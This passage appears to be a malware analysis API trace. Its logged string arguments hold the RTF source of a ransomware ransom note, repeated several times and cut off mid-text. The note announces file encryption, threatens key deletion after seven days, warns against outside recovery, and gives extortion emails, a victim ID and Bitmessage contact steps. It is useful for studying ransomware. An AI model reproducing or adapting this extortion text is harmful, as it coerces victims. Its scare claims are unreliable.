COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 